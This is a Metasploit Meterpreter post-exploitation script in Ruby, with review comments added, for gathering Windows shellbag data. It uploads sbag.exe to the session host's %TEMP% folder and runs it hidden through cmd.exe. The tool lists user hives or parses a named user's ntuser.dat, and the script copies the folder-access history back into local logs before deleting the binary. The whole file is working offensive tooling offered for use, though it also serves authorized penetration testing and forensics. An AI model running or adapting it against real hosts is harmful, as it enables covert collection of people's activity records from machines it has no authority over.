#
# Meterpreter script for uploading shellbag
#
# Author(s): James Fitts and Jason Haddix ++ Josh Grunzweig
#------------------------------------------------------------
################## Variable Declarations ##################
# System information reported by the session host; only 'Computer' is read below.
info = @client.sys.config.sysinfo

# Local copy of sbag.exe (under the framework's data directory) that upload() sends.
file = File.join(Msf::Config.install_root, 'data', 'sbag.exe')

# Timestamp suffix appended to the log directory name.
# NOTE(review): the format has no hour field (%H), so two runs in different
# hours can produce the same suffix - confirm that is intended.
filenameinfo = "_#{::Time.now.strftime("%Y%m%d.%M%S")}"

# Per-run log directory. The computer name comes from the remote host, so it is
# passed through Rex::FileUtils.clean_path before it becomes part of a local path.
@logfol = logs = ::File.join(
  Msf::Config.log_directory,
  'scripts',
  'shellbag',
  Rex::FileUtils.clean_path(info['Computer'] + filenameinfo)
)

# Create the log directory (and any missing parents).
::FileUtils.mkdir_p(logs)

# Command-line options. The first array element says whether the option takes a value.
# NOTE(review): the "-u" help text names C:\WINDOWS\TEMP, while upload() writes to
# whatever %TEMP% expands to on the session host - the two may differ.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "This help menu"],
  "-u" => [ false, "Uploads sbag.exe to the C:\\WINDOWS\\TEMP directory"],
  "-l" => [ false, "Lists the user hives available"],
  "-d" => [ true, "Dumps the user hive to a file."],
  "-r" => [ false, "Removes sbag.exe from the system"]
)
#-----------------------------------------------------------
# Prints the script banner and the option summary, then ends the script by
# raising Rex::Script::Completed. Never returns normally.
def usage
  [
    "Shellbag Meterpreter Script",
    "Usage: shellbag <options>"
  ].each { |banner_line| print_line(banner_line) }
  print(@@exec_opts.usage)
  raise Rex::Script::Completed
end
#-----------------------------------------------------------
# Copies the local sbag.exe into the session host's %TEMP% directory.
#
# session - the Meterpreter session to upload through
# file    - local path of the file to send
#
# The uploaded file stays in %TEMP% on the host until remove() is run, so every
# use of this script leaves an on-disk artifact there in the meantime.
def upload(session, file)
  remote_path = "#{session.fs.file.expand_path("%TEMP%")}\\sbag.exe"
  print_status("Uploading sbag.exe ...")
  session.fs.file.upload_file(remote_path, "#{file}")
  print_status("sbag.exe uploaded as #{remote_path} ...")
end
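#-----------------------------------------------------------
# Runs "sbag.exe -livehives" from the session host's %TEMP% directory and
# returns everything the process wrote to its channel as one String.
#
# The process is started hidden and channelized so its output can be read back
# over the session. The channel and the process handle are closed in an
# `ensure` block so they are released even when a read raises part-way through.
#
# NOTE(review): the expanded %TEMP% path is not quoted inside the command line;
# a path containing spaces would presumably not run as intended - confirm.
def list()
  print_status("Receiving data...")
  tmp = session.fs.file.expand_path("%TEMP%")
  r = session.sys.process.execute("cmd.exe /c #{tmp}\\sbag.exe -livehives", nil, {'Hidden' => true,'Channelized' => true})
  output = ""
  begin
    # read returns nil once the channel has no more data
    while (d = r.channel.read)
      output << d
    end
  ensure
    r.channel.close
    r.close
  end
  output
end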
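#-----------------------------------------------------------
# Runs sbag.exe against one user's ntuser.dat on the session host and writes
# the captured output to "<@logfol>/<username>.txt" on the local machine.
#
# username - profile directory name under "c:\documents and settings"
#
# username is interpolated both into a cmd.exe command line and into a local
# file path, so it is validated before use. An empty value, "." or "..", or a
# value containing a double quote, a percent sign, a path separator, a control
# character or another character Windows does not allow in account names is
# rejected with an error message, and nothing is executed or written.
def dump(username)
  name = username.to_s
  unsafe = %r{["/\\\[\]:;|=,+*?<>%\x00-\x1f]}
  if name.empty? || name == "." || name == ".." || name =~ unsafe
    print_error("Invalid username for -d: #{username.inspect}")
    return
  end

  print_status("Recieving data...")
  tmp = session.fs.file.expand_path("%TEMP%")
  r = session.sys.process.execute("cmd.exe /c #{tmp}\\sbag.exe \"c:\\documents and settings\\#{name}\\ntuser.dat\"", nil, {'Hidden' => true,'Channelized' => true})
  output = ""
  begin
    # read returns nil once the channel has no more data
    while (d = r.channel.read)
      output << d
    end
  ensure
    # release the channel and process handle even if a read raised
    r.channel.close
    r.close
  end
  flname = "#{@logfol}/#{name}.txt"
  file_local_write(flname, output)
  print_status("Shellbag data successfully dumped to the logs!")
end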
#-----------------------------------------------------------
# Asks cmd.exe on the session host to delete sbag.exe from %TEMP%.
#
# The delete command's result is not read back, so the closing status message
# is printed whether or not the file was actually removed.
# NOTE(review): the expanded %TEMP% path is not quoted in the command line;
# a path containing spaces would presumably not be handled as intended - confirm.
def remove()
  print_status("Removing sbag.exe from the system...")
  target = "#{session.fs.file.expand_path("%TEMP%")}\\sbag.exe"
  session.sys.process.execute("cmd.exe /c del #{target}")
  print_status("sbag.exe removed!")
end
################## MAIN ##################
# Record which options were given. "-h" is handled immediately: usage raises
# Rex::Script::Completed, which ends the script.
chosen = {}
username = nil
@@exec_opts.parse(args) do |opt, _idx, val|
  case opt
  when "-h" then usage
  when "-u" then chosen[:upload] = true
  when "-l" then chosen[:list] = true
  when "-r" then chosen[:remove] = true
  when "-d"
    chosen[:dump] = true
    # value supplied after -d; passed to dump() unchanged
    username = val
  end
end

# Only one action runs per invocation. When several options are combined the
# precedence is: upload, list, remove, dump.
if args.length < 1
  usage()
elsif chosen[:upload]
  upload(session, file)
elsif chosen[:list]
  print list()
elsif chosen[:remove]
  remove()
elsif chosen[:dump]
  dump(username)
end